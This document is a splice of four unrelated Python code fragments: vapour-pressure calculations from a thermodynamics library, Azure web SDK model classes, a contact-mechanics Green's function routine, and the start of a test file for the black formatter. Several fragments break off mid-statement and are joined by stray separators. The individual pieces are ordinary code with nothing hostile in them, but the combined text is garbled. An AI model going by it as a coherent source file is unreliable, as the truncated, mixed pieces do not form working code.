T_REF_IG = self.T_REF_IG
self._Psats_T_ref = [VaporPressures[i](T_REF_IG) for i in cmps]
return self._Psats_T_ref
def Psats_at(self, T):
if self.Psats_locked:
return self._Psats_at_locked(T, self._Psats_data, self.cmps)
VaporPressures = self.VaporPressures
return [VaporPressures[i](T) for i in self.cmps]
@staticmethod
def _Psats_at_locked(T, Psats_data, cmps):
Psats = []
T_inv = 1.0/T
logT = log(T)
Tmins, Tmaxes, coeffs = Psats_data[0], Psats_data[3], Psats_data[6]
for i in cmps:
if T < Tmins[i]:
A, B, C = Psats_data[9][i]
Psat = (A + B*T_inv + C*logT)
# A, B = _Psats_data[9][i]
# Psat = (A - B*T_inv)
# Psat = (T - Tmins[i])*_Psats_data[1][i] + _Psats_data[2][i]
elif T > Tmaxes[i]:
A, B, C = Psats_data[10][i]
Psat = (A + B*T_inv + C*logT)
# A, B = _Psats_data[10][i]
# Psat = (A - B*T_inv)
# Psat = (T - Tmaxes[i])*_Psats_data[4][i] + _Psats_data[5][i]
else:
Psat = 0.0
for c in coeffs[i]:
Psat = Psat*T + c
try:
Psats.append(exp(Psat))
except:
Psats.append(1.6549840276802644e+300)
return Psats
def Psats(self):
try:
return self._Psats
except AttributeError:
pass
T, cmps = self.T, self.cmps
if self.Psats_locked:
self._Psats = Psats = self._Psats_at_locked(T, self._Psats_data, cmps)
# _Psats_data = self._Psats_data
# Tmins, Tmaxes, coeffs = _Psats_data[0], _Psats_data[3], _Psats_data[6]
# for i in cmps:
# if T < Tmins[i]:
# A, B, C = _Psats_data[9][i]
# Psat = (A + B*T_inv + C*logT)
## A, B = _Psats_data[9][i]
## Psat = (A - B*T_inv)
## Psat = (T - Tmins[i])*_Psats_data[1][i] + _Psats_data[2][i]
# elif T > Tmaxes[i]:
# Psat = (T - Tmaxes[i])*_Psats_data[4][i] + _Psats_data[5][i]
# else:
# Psat = 0.0
# for c in coeffs[i]:
# Psat = Psat*T + c
# Psats.append(exp(Psat))
return Psats
self._Psats = Psats = []
for i in self.VaporPressures:
Psats.append(i.T_dependent_property(T))
if self.has_henry_components:
henry_components = self.henry_components
henry_data = self.henry_data
cmps = self.cmps
zs = self.zs
for i in cmps:
# Vcs = [1, 1, 1]
Vcs = [5.6000000000000006e-05, 0.000168, 7.340000000000001e-05]
if henry_components[i]:
# WORKING - Need a bunch of conversions of data in terms of other values
# into this basis
d = henry_data[i]
z_sum = 0.0
logH = 0.0
for j in cmps:
if d[j]:
r = d[j]
t = T
# t = T - 273.15
log_Hi = (r[0] + r[1]/t + r[2]*log(t) + r[3]*t + r[4]/t**2)
# print(log_Hi)
wi = zs[j]*Vcs[j]**(2.0/3.0)/sum([zs[_]*Vcs[_]**(2.0/3.0) for _ in cmps if d[_]])
# print(wi)
logH += wi*log_Hi
# logH += zs[j]*log_Hi
z_sum += zs[j]
# print(logH, z_sum)
z_sum = 1
Psats[i] = exp(logH/z_sum)*1e5 # bar to Pa
return Psats
# def PIP(self):
# # Force liquid
# return 2.0
@staticmethod
def _dPsats_dT_at_locked(T, Psats_data, cmps, Psats):
T_inv = 1.0/T
Tinv2 = T_inv*T_inv
dPsats_dT = []
Tmins, Tmaxes, dcoeffs, coeffs_low, coeffs_high = Psats_data[0], Psats_data[3], Psats_data[7], Psats_data[9], Psats_data[10]
for i in cmps:
if T < Tmins[i]:
# A, B = _Psats_data[9][i]
# dPsat_dT = B*Tinv2*Psats[i]
dPsat_dT = Psats[i]*(-coeffs_low[i][1]*Tinv2 + coeffs_low[i][2]*T_inv)
# dPsat_dT = _Psats_data[1][i]*Psats[i]#*exp((T - Tmins[i])*_Psats_data[1][i]
# + _Psats_data[2][i])
elif T > Tmaxes[i]:
dPsat_dT = Psats[i]*(-coeffs_high[i][1]*Tinv2 + coeffs_high[i][2]*T_inv)
# dPsat_dT = _Psats_data[4][i]*Psats[i]#*exp((T - Tmaxes[i])
# #*_Psats_data[4][i]
# #+ _Psats_data[5][i])
else:
dPsat_dT = 0.0
for c in dcoeffs[i]:
dPsat_dT = dPsat_dT*T + c
# v, der = horner_and_der(coeffs[i], T)
dPsat_dT *= Psats[i]
dPsats_dT.append(dPsat_dT)
return dPsats_dT
def dPsats_dT_at(self, T, Psats=None):
if Psats is None:
Psats = self.Psats_at(T)
if self.Psats_locked:
return self._dPsats_dT_at_locked(T, self._Psats_data, self.cmps, Psats)
return [VaporPressure.T_dependent_property_derivative(T=T)
for VaporPressure in self.VaporPressures]
def dPsats_dT(self):
try:
return self._dPsats_dT
except:
pass
T, cmps = self.T, self.cmps
# Need to reset the method because for the T bounded solver,
# will normally get a different than prefered method as it starts
# at the boundaries
if self.Psats_locked:
try:
Psats = self._Psats
except AttributeError:
Psats = self.Psats()
self._dPsats_dT = dPsats_dT = self._dPsats_dT_at_locked(T, self._Psats_data, cmps, Psats)
return dPsats_dT
self._dPsats_dT = dPsats_dT = [VaporPressure.T_dependent_property_derivative(T=T)
for VaporPressure in self.VaporPressures]
return dPsats_dT
def d2Psats_dT2(self):
try:
return self._d2Psats_dT2
except:
pass
try:
Psats = self._Psats
except AttributeError:
Psats = self.Psats()
try:
dPsats_dT = self._dPsats_dT
except AttributeError:
dPsats_dT = self.dPsats_dT()
T, cmps = self.T, self.cmps
T_inv = 1.0/T
T_inv2 = T_inv*T_inv
Tinv3 = T_inv*T_inv*T_inv
self._d2Psats_dT2 = d2Psats_dT2 = []
if self.Psats_locked:
Psats_data = self._Psats_data
Tmins, Tmaxes, d2coeffs = Psats_data[0], Psats_data[3], Psats_data[8]
for i in cmps:
if T < Tmins[i]:
# A, B = _Psats_data[9][i]
# d2Psat_dT2 = B*Psats[i]*(B*T_inv - 2.0)*Tinv3
A, B, C = Psats_data[9][i]
x0 = (B*T_inv - C)
d2Psat_dT2 = Psats[i]*(2.0*B*T_inv - C + x0*x0)*T_inv2
# d2Psat_dT2 = _Psats_data[1][i]*dPsats_dT[i]
elif T > Tmaxes[i]:
A, B, C = Psats_data[10][i]
x0 = (B*T_inv - C)
d2Psat_dT2 = Psats[i]*(2.0*B*T_inv - C + x0*x0)*T_inv2
# d2Psat_dT2 = _Psats_data[4][i]*dPsats_dT[i]
else:
d2Psat_dT2 = 0.0
for c in d2coeffs[i]:
d2Psat_dT2 = d2Psat_dT2*T + c
d2Psat_dT2 = (dPsats_dT[i]*dPsats_dT[i]/Psats[i] + Psats[i]*d2Psat_dT2)
d2Psats_dT2.append(d2Psat_dT2)
return d2Psats_dT2
self._d2Psats_dT2 = d2Psats_dT2 = [VaporPressure.T_dependent_property_derivative(T=T, n=2)
for VaporPressure in self.VaporPressures]
return d2Psats_dT2
def lnPsats(self):
try:
return self._lnPsats
except AttributeError:
pass
T, cmps = self.T, self.cmps
T_inv = 1.0/T
logT = log(T)
lnPsats = []
if self.Psats_locked:
Psats_data = self._Psats_data
Tmins, Tmaxes, coeffs = Psats_data[0], Psats_data[3], Psats_data[6]
for i in cmps:
if T < Tmins[i]:
A, B, C = Psats_data[9][i]
Psat = (A + B*T_inv + C*logT)
elif T > Tmaxes[i]:
A, B, C = Psats_data[10][i]
Psat = (A + B*T_inv + C*logT)
# Psat = (T - Tmaxes[i])*_Psats_data[4][i] + _Psats_data[5][i]
else:
Psat = 0.0
for c in coeffs[i]:
Psat = Psat*T + c
lnPsats.append(Psat)
self._lnPsats = lnPsats
return lnPsats
self._lnPsats = [log(i) for i in self.Psats()]
return self._lnPsats
def dlnPsats_dT(self):
T, cmps = self.T, self.cmps
T_inv = 1.0/T
Tinv2 = T_inv*T_inv
if self.Psats_locked:
Psats_data = self._Psats_data
Tmins, Tmaxes, dcoeffs = Psats_data[0], Psats_data[3], Psats_data[7]
dlnPsats_dT = []
for i in cmps:
if T < Tmins[i]:
A, B, C = Psats_data[9][i]
dPsat_dT | |
of the Traffic Manager profile to use, if
it exists. Traffic Manager resource ID is of the form
/subscriptions/{subId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/trafficManagerProfiles/{profileName}.
:paramtype traffic_manager_profile_id: str
:keyword traffic_manager_profile_name: Name of Traffic Manager profile to create. This is only
needed if Traffic Manager profile does not already exist.
:paramtype traffic_manager_profile_name: str
:keyword ignore_quotas: :code:`<code>true</code>` if quotas should be ignored; otherwise,
:code:`<code>false</code>`.
:paramtype ignore_quotas: bool
"""
super(CloningInfo, self).__init__(**kwargs)
self.correlation_id = correlation_id
self.overwrite = overwrite
self.clone_custom_host_names = clone_custom_host_names
self.clone_source_control = clone_source_control
self.source_web_app_id = source_web_app_id
self.hosting_environment = hosting_environment
self.app_settings_overrides = app_settings_overrides
self.configure_load_balancing = configure_load_balancing
self.traffic_manager_profile_id = traffic_manager_profile_id
self.traffic_manager_profile_name = traffic_manager_profile_name
self.ignore_quotas = ignore_quotas
class ConnStringInfo(msrest.serialization.Model):
"""Database connection string information.
:ivar name: Name of connection string.
:vartype name: str
:ivar connection_string: Connection string value.
:vartype connection_string: str
:ivar type: Type of database. Possible values include: "MySql", "SQLServer", "SQLAzure",
"Custom", "NotificationHub", "ServiceBus", "EventHub", "ApiHub", "DocDb", "RedisCache",
"PostgreSQL".
:vartype type: str or ~azure.mgmt.web.v2016_09_01.models.ConnectionStringType
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'connection_string': {'key': 'connectionString', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(
self,
*,
name: Optional[str] = None,
connection_string: Optional[str] = None,
type: Optional[Union[str, "ConnectionStringType"]] = None,
**kwargs
):
"""
:keyword name: Name of connection string.
:paramtype name: str
:keyword connection_string: Connection string value.
:paramtype connection_string: str
:keyword type: Type of database. Possible values include: "MySql", "SQLServer", "SQLAzure",
"Custom", "NotificationHub", "ServiceBus", "EventHub", "ApiHub", "DocDb", "RedisCache",
"PostgreSQL".
:paramtype type: str or ~azure.mgmt.web.v2016_09_01.models.ConnectionStringType
"""
super(ConnStringInfo, self).__init__(**kwargs)
self.name = name
self.connection_string = connection_string
self.type = type
class CorsSettings(msrest.serialization.Model):
"""Cross-Origin Resource Sharing (CORS) settings for the app.
:ivar allowed_origins: Gets or sets the list of origins that should be allowed to make
cross-origin
calls (for example: http://example.com:12345). Use "*" to allow all.
:vartype allowed_origins: list[str]
"""
_attribute_map = {
'allowed_origins': {'key': 'allowedOrigins', 'type': '[str]'},
}
def __init__(
self,
*,
allowed_origins: Optional[List[str]] = None,
**kwargs
):
"""
:keyword allowed_origins: Gets or sets the list of origins that should be allowed to make
cross-origin
calls (for example: http://example.com:12345). Use "*" to allow all.
:paramtype allowed_origins: list[str]
"""
super(CorsSettings, self).__init__(**kwargs)
self.allowed_origins = allowed_origins
class CsmUsageQuota(msrest.serialization.Model):
"""Usage of the quota resource.
:ivar unit: Units of measurement for the quota resource.
:vartype unit: str
:ivar next_reset_time: Next reset time for the resource counter.
:vartype next_reset_time: ~datetime.datetime
:ivar current_value: The current value of the resource counter.
:vartype current_value: long
:ivar limit: The resource limit.
:vartype limit: long
:ivar name: Quota name.
:vartype name: ~azure.mgmt.web.v2016_09_01.models.LocalizableString
"""
_attribute_map = {
'unit': {'key': 'unit', 'type': 'str'},
'next_reset_time': {'key': 'nextResetTime', 'type': 'iso-8601'},
'current_value': {'key': 'currentValue', 'type': 'long'},
'limit': {'key': 'limit', 'type': 'long'},
'name': {'key': 'name', 'type': 'LocalizableString'},
}
def __init__(
self,
*,
unit: Optional[str] = None,
next_reset_time: Optional[datetime.datetime] = None,
current_value: Optional[int] = None,
limit: Optional[int] = None,
name: Optional["LocalizableString"] = None,
**kwargs
):
"""
:keyword unit: Units of measurement for the quota resource.
:paramtype unit: str
:keyword next_reset_time: Next reset time for the resource counter.
:paramtype next_reset_time: ~datetime.datetime
:keyword current_value: The current value of the resource counter.
:paramtype current_value: long
:keyword limit: The resource limit.
:paramtype limit: long
:keyword name: Quota name.
:paramtype name: ~azure.mgmt.web.v2016_09_01.models.LocalizableString
"""
super(CsmUsageQuota, self).__init__(**kwargs)
self.unit = unit
self.next_reset_time = next_reset_time
self.current_value = current_value
self.limit = limit
self.name = name
class CsmUsageQuotaCollection(msrest.serialization.Model):
"""Collection of CSM usage quotas.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar value: Required. Collection of resources.
:vartype value: list[~azure.mgmt.web.v2016_09_01.models.CsmUsageQuota]
:ivar next_link: Link to next page of resources.
:vartype next_link: str
"""
_validation = {
'value': {'required': True},
'next_link': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[CsmUsageQuota]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
*,
value: List["CsmUsageQuota"],
**kwargs
):
"""
:keyword value: Required. Collection of resources.
:paramtype value: list[~azure.mgmt.web.v2016_09_01.models.CsmUsageQuota]
"""
super(CsmUsageQuotaCollection, self).__init__(**kwargs)
self.value = value
self.next_link = None
class ErrorEntity(msrest.serialization.Model):
"""Body of the error response returned from the API.
:ivar extended_code: Type of error.
:vartype extended_code: str
:ivar message_template: Message template.
:vartype message_template: str
:ivar parameters: Parameters for the template.
:vartype parameters: list[str]
:ivar inner_errors: Inner errors.
:vartype inner_errors: list[~azure.mgmt.web.v2016_09_01.models.ErrorEntity]
:ivar code: Basic error code.
:vartype code: str
:ivar message: Any details of the error.
:vartype message: str
"""
_attribute_map = {
'extended_code': {'key': 'extendedCode', 'type': 'str'},
'message_template': {'key': 'messageTemplate', 'type': 'str'},
'parameters': {'key': 'parameters', 'type': '[str]'},
'inner_errors': {'key': 'innerErrors', 'type': '[ErrorEntity]'},
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(
self,
*,
extended_code: Optional[str] = None,
message_template: Optional[str] = None,
parameters: Optional[List[str]] = None,
inner_errors: Optional[List["ErrorEntity"]] = None,
code: Optional[str] = None,
message: Optional[str] = None,
**kwargs
):
"""
:keyword extended_code: Type of error.
:paramtype extended_code: str
:keyword message_template: Message template.
:paramtype message_template: str
:keyword parameters: Parameters for the template.
:paramtype parameters: list[str]
:keyword inner_errors: Inner errors.
:paramtype inner_errors: list[~azure.mgmt.web.v2016_09_01.models.ErrorEntity]
:keyword code: Basic error code.
:paramtype code: str
:keyword message: Any details of the error.
:paramtype message: str
"""
super(ErrorEntity, self).__init__(**kwargs)
self.extended_code = extended_code
self.message_template = message_template
self.parameters = parameters
self.inner_errors = inner_errors
self.code = code
self.message = message
class Experiments(msrest.serialization.Model):
"""Routing rules in production experiments.
:ivar ramp_up_rules: List of ramp-up rules.
:vartype ramp_up_rules: list[~azure.mgmt.web.v2016_09_01.models.RampUpRule]
"""
_attribute_map = {
'ramp_up_rules': {'key': 'rampUpRules', 'type': '[RampUpRule]'},
}
def __init__(
self,
*,
ramp_up_rules: Optional[List["RampUpRule"]] = None,
**kwargs
):
"""
:keyword ramp_up_rules: List of ramp-up rules.
:paramtype ramp_up_rules: list[~azure.mgmt.web.v2016_09_01.models.RampUpRule]
"""
super(Experiments, self).__init__(**kwargs)
self.ramp_up_rules = ramp_up_rules
class HandlerMapping(msrest.serialization.Model):
"""The IIS handler mappings used to define which handler processes HTTP requests with certain extension.
For example, it is used to configure php-cgi.exe process to handle all HTTP requests with *.php extension.
:ivar extension: Requests with this extension will be handled using the specified FastCGI
application.
:vartype extension: str
:ivar script_processor: The absolute path to the FastCGI application.
:vartype script_processor: str
:ivar arguments: Command-line arguments to be passed to the script processor.
:vartype arguments: str
"""
_attribute_map = {
'extension': {'key': 'extension', 'type': 'str'},
'script_processor': {'key': 'scriptProcessor', 'type': 'str'},
'arguments': {'key': 'arguments', 'type': 'str'},
}
def __init__(
self,
*,
extension: Optional[str] = None,
script_processor: Optional[str] = None,
arguments: Optional[str] = None,
**kwargs
):
"""
:keyword extension: Requests with this extension will be handled using the specified FastCGI
application.
:paramtype extension: str
:keyword script_processor: The absolute path to the FastCGI application.
:paramtype script_processor: str
:keyword arguments: Command-line arguments to be passed to the script processor.
:paramtype arguments: str
"""
super(HandlerMapping, self).__init__(**kwargs)
self.extension = extension
self.script_processor = script_processor
self.arguments = arguments
class HostingEnvironmentDiagnostics(msrest.serialization.Model):
"""Diagnostics for an App Service Environment.
:ivar name: Name/identifier of the diagnostics.
:vartype name: str
:ivar diagnosics_output: Diagnostics output.
:vartype diagnosics_output: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'diagnosics_output': {'key': 'diagnosicsOutput', 'type': 'str'},
}
def __init__(
self,
*,
name: Optional[str] = None,
diagnosics_output: Optional[str] = None,
**kwargs
):
"""
:keyword name: Name/identifier of the diagnostics.
:paramtype name: str
:keyword diagnosics_output: Diagnostics output.
:paramtype diagnosics_output: str
"""
super(HostingEnvironmentDiagnostics, self).__init__(**kwargs)
self.name = name
self.diagnosics_output = diagnosics_output
class HostingEnvironmentProfile(msrest.serialization.Model):
"""Specification for an App Service Environment to use for this resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Resource ID of the App Service Environment.
:vartype id: str
:ivar name: Name of the App Service Environment.
:vartype name: str
:ivar type: Resource type of the App Service Environment.
:vartype type: str
"""
_validation = {
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(
self,
*,
id: Optional[str] = None,
**kwargs
):
"""
:keyword id: Resource ID of the App Service Environment.
:paramtype id: str
"""
super(HostingEnvironmentProfile, self).__init__(**kwargs)
self.id = id
self.name = None
self.type = None
class HostNameSslState(msrest.serialization.Model):
"""SSL-enabled hostname.
:ivar name: Hostname.
:vartype name: str
:ivar ssl_state: SSL type. Possible values include: "Disabled", "SniEnabled", "IpBasedEnabled".
:vartype ssl_state: str or ~azure.mgmt.web.v2016_09_01.models.SslState
:ivar virtual_ip: Virtual IP address assigned to the hostname if IP based SSL is enabled.
:vartype virtual_ip: str
:ivar thumbprint: SSL | |
fft(u) = w*fft(p), see (6) Stanley & <NAME>. 119(3), 481-485
(Jul 01, 1997).
For the infinite halfspace,
.. math ::
w = q E^* / 2
q is the wavevector (:math:`2 \pi / wavelength`)
WARNING: the paper is dimensionally *incorrect*. see for the correct
1D formulation: Section 13.2 in
<NAME>. (1985). Contact Mechanics. [Online]. Cambridge:
Cambridge University Press. Available from: Cambridge Books Online
<http://dx.doi.org/10.1017/CBO9781139171731> [Accessed 16 February
2015]
for correct 2D formulation: Appendix 1, eq A.2 in
Johnson, Greenwood and Higginson, "The Contact of Elastic Regular
Wavy surfaces", Int. J. Mech. Sci. Vol. 27 No. 6, pp. 383-396, 1985
<http://dx.doi.org/10.1016/0020-7403(85)90029-3> [Accessed 18 March
2015]
"""
if self.dim == 1:
nx, = self.nb_grid_pts
sx, = self.physical_sizes
# Note: q-values from 0 to 1, not from 0 to 2*pi
qx = np.arange(self.fourier_locations[0],
self.fourier_locations[0] +
self.nb_fourier_grid_pts[0], dtype=np.float64)
qx = np.where(qx <= nx // 2, qx / sx, (nx - qx) / sx)
surface_stiffness = np.pi * self.contact_modulus * qx
if self.stiffness_q0 is None:
surface_stiffness[0] = surface_stiffness[1].real
elif self.stiffness_q0 == 0.0:
surface_stiffness[0] = 1.0
else:
surface_stiffness[0] = self.stiffness_q0
greens_function = 1 / surface_stiffness
if self.fourier_locations == (0,):
if self.stiffness_q0 == 0.0:
greens_function[0, 0] = 0.0
elif self.dim == 2:
if np.prod(self.nb_fourier_grid_pts) == 0:
greens_function = np.zeros(self.nb_fourier_grid_pts, order='f',
dtype=complex)
else:
nx, ny = self.nb_grid_pts
sx, sy = self.physical_sizes
# Note: q-values from 0 to 1, not from 0 to 2*pi
qx = np.arange(self.fourier_locations[0],
self.fourier_locations[0] +
self.nb_fourier_grid_pts[0], dtype=np.float64)
qx = np.where(qx <= nx // 2, qx / sx, (nx - qx) / sx)
qy = np.arange(self.fourier_locations[1],
self.fourier_locations[1] +
self.nb_fourier_grid_pts[1], dtype=np.float64)
qy = np.where(qy <= ny // 2, qy / sy, (ny - qy) / sy)
q = np.sqrt((qx * qx).reshape(-1, 1) +
(qy * qy).reshape(1, -1))
if self.fourier_locations == (0, 0):
q[0, 0] = np.NaN
# q[0,0] has no Impact on the end result,
# but q[0,0] = 0 produces runtime Warnings
# (because corr[0,0]=inf)
surface_stiffness = np.pi * self.contact_modulus * q
# E* / 2 (2 \pi / \lambda)
# (q is 1 / lambda, here)
if self.thickness is not None:
# Compute correction for finite thickness
q *= 2 * np.pi * self.thickness
fac = 3 - 4 * self.poisson
off = 4 * self.poisson * (2 * self.poisson - 3) + 5
with np.errstate(over="ignore", invalid="ignore",
divide="ignore"):
corr = (fac * np.cosh(2 * q) + 2 * q ** 2 + off) / \
(fac * np.sinh(2 * q) - 2 * q)
# The expression easily overflows numerically. These are
# then q-values that are converged to the infinite system
# expression.
corr[np.isnan(corr)] = 1.0
surface_stiffness *= corr
if self.fourier_locations == (0, 0):
surface_stiffness[0, 0] = \
self.young / self.thickness * \
(1 - self.poisson) / ((1 - 2 * self.poisson) *
(1 + self.poisson))
else:
if self.fourier_locations == (0, 0):
if self.stiffness_q0 is None:
surface_stiffness[0, 0] = \
(surface_stiffness[1, 0].real +
surface_stiffness[0, 1].real) / 2
elif self.stiffness_q0 == 0.0:
surface_stiffness[0, 0] = 1.0
else:
surface_stiffness[0, 0] = self.stiffness_q0
greens_function = 1 / surface_stiffness
if self.fourier_locations == (0, 0):
if self.stiffness_q0 == 0.0:
greens_function[0, 0] = 0.0
return greens_function
def _compute_surface_stiffness(self):
"""
Invert the weights w relating fft(displacement) to fft(pressure):
"""
surface_stiffness = np.zeros(self.nb_fourier_grid_pts, order='f',
dtype=complex)
surface_stiffness[self.greens_function != 0] = \
1. / self.greens_function[self.greens_function != 0]
return surface_stiffness
def evaluate_disp(self, forces):
""" Computes the displacement due to a given force array
Keyword Arguments:
forces -- a numpy array containing point forces (*not* pressures)
"""
if forces.shape != self.nb_subdomain_grid_pts:
raise self.Error(
("force array has a different shape ({0}) than this "
"halfspace's nb_grid_pts ({1})").format(
forces.shape, self.nb_subdomain_grid_pts))
self.real_buffer.array()[...] = -forces
self.fftengine.fft(self.real_buffer, self.fourier_buffer)
self.fourier_buffer.array()[...] *= self.greens_function
self.fftengine.ifft(self.fourier_buffer, self.real_buffer)
return self.real_buffer.array().real / \
self.area_per_pt * self.fftengine.normalisation
def evaluate_force(self, disp):
""" Computes the force (*not* pressures) due to a given displacement
array.
Keyword Arguments:
disp -- a numpy array containing point displacements
"""
if disp.shape != self.nb_subdomain_grid_pts:
raise self.Error(
("displacements array has a different shape ({0}) than "
"this halfspace's nb_grid_pts ({1})").format(
disp.shape, self.nb_subdomain_grid_pts))
self.real_buffer.array()[...] = disp
self.fftengine.fft(self.real_buffer, self.fourier_buffer)
self.fourier_buffer.array()[...] *= self.surface_stiffness
self.fftengine.ifft(self.fourier_buffer, self.real_buffer)
return -self.real_buffer.array().real * \
self.area_per_pt * self.fftengine.normalisation
def evaluate_k_disp(self, forces):
""" Computes the K-space displacement due to a given force array
Parameters
__________
forces : ndarray
a numpy array containing point forces (*not* pressures)
Returns
_______
displacement : ndarray
displacement in k-space
"""
if forces.shape != self.nb_subdomain_grid_pts:
raise self.Error(
("force array has a different shape ({0}) than this halfspace'"
"s nb_grid_pts ({1})").format(
forces.shape, self.nb_subdomain_grid_pts)) # nopep8
self.real_buffer.array()[...] = -forces
self.fftengine.fft(self.real_buffer, self.fourier_buffer)
return self.greens_function * \
self.fourier_buffer.array() / self.area_per_pt
def evaluate_k_force(self, disp):
""" Computes the K-space forces (*not* pressures) due to a given
displacement array.
Keyword Arguments:
disp -- a numpy array containing point displacements
"""
if disp.shape != self.nb_subdomain_grid_pts:
raise self.Error(
("displacements array has a different shape ({0}) than this "
"halfspace's nb_grid_pts ({1})").format(
disp.shape, self.nb_subdomain_grid_pts)) # nopep8
self.real_buffer.array()[...] = disp
self.fftengine.fft(self.real_buffer, self.fourier_buffer)
return -self.surface_stiffness * self.fourier_buffer.array() * \
self.area_per_pt
def evaluate_k_force_k(self, disp_k):
""" Computes the K-space forces (*not* pressures) due to a given
K-space displacement array.
Parameters
__________
disp : ndarray k-space
a numpy k-space array containing point displacements
Returns
_______
force_k : nd array k-sapce forces
"""
return -self.surface_stiffness * disp_k * self.area_per_pt
def evaluate_elastic_energy(self, forces, disp):
"""
computes and returns the elastic energy due to forces and displacements
Arguments:
forces -- array of forces
disp -- array of displacements
"""
# pylint: disable=no-self-use
return .5 * self.pnp.dot(np.ravel(disp), np.ravel(-forces))
def evaluate_scalar_product_k_space(self, ka, kb):
r"""
Computes the scalar product, i.e. the power, between the `a` and `b`,
given their fourier representation.
`Power theorem
<https://ccrma.stanford.edu/~jos/mdft/Power_Theorem.html>`_:
.. math ::
P = \sum_{ij} a_{ij} b_{ij} =
\frac{1}{n_x n_y}\sum_{ij}
\tilde a_{ij} \overline{\tilde b_{ij}}
Note that for `a`, `b` real,
.. math :: P = \sum_{kl} Re(\tilde a_{kl}) Re(\tilde b_{kl})
+ Im(\tilde a_{kl}) Im(\tilde b_{kl})
Parameters
----------
ka, kb:
arrays of complex type and of size substrate.nb_fourier_grid_pts
Fourier representation (output of a 2D rfftn) `a` (resp. `b`)
(`nx, ny` real array)
Returns
-------
P
The scalar product of a and b
"""
# ka and kb are the output of the 2D rfftn, that means the a
# part of the transform is omitted because of the symetry along the
# last dimension
#
# That's why the components whose symetrics have been omitted are
# weighted with a factor of 2.
#
# The first column (indexes [...,0], wavevector 0 along the last
# dimension) has no symetric
#
# When the number of points in the last dimension is even, the last
# column (Nyquist Frequency) has also no symetric.
#
# The serial code implementation would look like this
# if (self.nb_domain_grid_pts[-1] % 2 == 0)
# return .5*(np.vdot(ka, kb).real +
# # adding the data that has been omitted by rfftn
# np.vdot(ka[..., 1:-1], kb[..., 1:-1]).real
# # because of symetry
# )/self.nb_pts
# else :
# return .5 * (np.vdot(ka, kb).real +
# # adding the data that has been omitted by rfftn
# # np.vdot(ka[..., 1:], kb[..., 1:]).real
# # # because of symetry
# # )/self.nb_pts
#
# Parallelized Version
# The inner part of the fourier data should always be symetrized (i.e.
# multiplied by 2). When the fourier subdomain contains boundary values
# (wavevector 0 (even and odd) and ny//2 (only for odd)) these values
# should only be added once
if ka.size > 0:
if self.fourier_locations[0] == 0:
# First row of this fourier data is first of global data
fact0 = 1
elif self.nb_fourier_grid_pts[0] > 1:
# local first row is not the first in the global data
fact0 = 2
else:
fact0 = 0
if self.fourier_locations[0] == 0 and \
self.nb_fourier_grid_pts[0] == 1:
factend = 0
elif (self.nb_domain_grid_pts[0] % 2 == 1):
# odd number of points, last row have always to be symmetrized
factend = 2
elif self.fourier_locations[0] + \
self.nb_fourier_grid_pts[0] - 1 == \
| |
<gh_stars>1-10
#!/usr/bin/env python3
import asyncio
from concurrent.futures import ThreadPoolExecutor
from contextlib import contextmanager
from functools import partial
from io import BytesIO, TextIOWrapper
import os
from pathlib import Path
import re
import sys
from tempfile import TemporaryDirectory
from typing import Any, BinaryIO, Generator, List, Tuple, Iterator
import unittest
from unittest.mock import patch, MagicMock
from click import unstyle
from click.testing import CliRunner
import black
ll = 88
ff = partial(black.format_file_in_place, line_length=ll, fast=True)
fs = partial(black.format_str, line_length=ll)
THIS_FILE = Path(__file__)
THIS_DIR = THIS_FILE.parent
EMPTY_LINE = "# EMPTY LINE WITH WHITESPACE" + " (this comment will be removed)"
def dump_to_stderr(*output: str) -> str:
return "\n" + "\n".join(output) + "\n"
def read_data(name: str, data: bool = True) -> Tuple[str, str]:
"""read_data('test_name') -> 'input', 'output'"""
if not name.endswith((".py", ".pyi", ".out", ".diff")):
name += ".py"
_input: List[str] = []
_output: List[str] = []
base_dir = THIS_DIR / "data" if data else THIS_DIR
with open(base_dir / name, "r", encoding="utf8") as test:
lines = test.readlines()
result = _input
for line in lines:
line = line.replace(EMPTY_LINE, "")
if line.rstrip() == "# output":
result = _output
continue
result.append(line)
if _input and not _output:
# If there's no output marker, treat the entire file as already pre-formatted.
_output = _input[:]
return "".join(_input).strip() + "\n", "".join(_output).strip() + "\n"
@contextmanager
def cache_dir(exists: bool = True) -> Iterator[Path]:
with TemporaryDirectory() as workspace:
cache_dir = Path(workspace)
if not exists:
cache_dir = cache_dir / "new"
with patch("black.CACHE_DIR", cache_dir):
yield cache_dir
@contextmanager
def event_loop(close: bool) -> Iterator[None]:
policy = asyncio.get_event_loop_policy()
old_loop = policy.get_event_loop()
loop = policy.new_event_loop()
asyncio.set_event_loop(loop)
try:
yield
finally:
policy.set_event_loop(old_loop)
if close:
loop.close()
class BlackRunner(CliRunner):
"""Modify CliRunner so that stderr is not merged with stdout.
This is a hack that can be removed once we depend on Click 7.x"""
def __init__(self, stderrbuf: BinaryIO) -> None:
self.stderrbuf = stderrbuf
super().__init__()
@contextmanager
def isolation(self, *args: Any, **kwargs: Any) -> Generator[BinaryIO, None, None]:
with super().isolation(*args, **kwargs) as output:
try:
hold_stderr = sys.stderr
sys.stderr = TextIOWrapper(self.stderrbuf, encoding=self.charset)
yield output
finally:
sys.stderr = hold_stderr
class BlackTestCase(unittest.TestCase):
maxDiff = None
def assertFormatEqual(self, expected: str, actual: str) -> None:
if actual != expected and not os.environ.get("SKIP_AST_PRINT"):
bdv: black.DebugVisitor[Any]
black.out("Expected tree:", fg="green")
try:
exp_node = black.lib2to3_parse(expected)
bdv = black.DebugVisitor()
list(bdv.visit(exp_node))
except Exception as ve:
black.err(str(ve))
black.out("Actual tree:", fg="red")
try:
exp_node = black.lib2to3_parse(actual)
bdv = black.DebugVisitor()
list(bdv.visit(exp_node))
except Exception as ve:
black.err(str(ve))
self.assertEqual(expected, actual)
